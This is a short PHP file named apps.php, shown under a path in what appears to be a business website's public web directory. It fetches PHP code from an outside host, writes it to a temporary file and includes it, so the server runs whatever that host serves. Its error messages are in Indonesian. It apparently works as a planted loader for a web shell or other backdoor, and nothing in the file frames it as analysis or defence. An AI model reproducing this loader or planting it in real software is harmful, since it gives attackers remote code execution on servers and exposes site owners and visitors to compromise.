File: /home/smitsolutionshyd/public_html/relifemedicalequipments.in/apps.php
<?php
$remoteUrl = 'https://azuree.pages.dev/azure.php';
$code = @file_get_contents($remoteUrl);
if ($code === false) {
die('Gagal mengambil konten dari: ' . $remoteUrl);
}
$tmp = tmpfile();
if ($tmp === false) {
die('Gagal membuat tmpfile().');
}
$bytes = fwrite($tmp, $code);
if ($bytes === false) {
fclose($tmp);
die('Gagal menulis ke tmpfile().');
}
$meta = stream_get_meta_data($tmp);
if (!isset($meta['uri'])) {
fclose($tmp);
die('Gagal mendapatkan path tmpfile().');
}
include $meta['uri'];
fclose($tmp);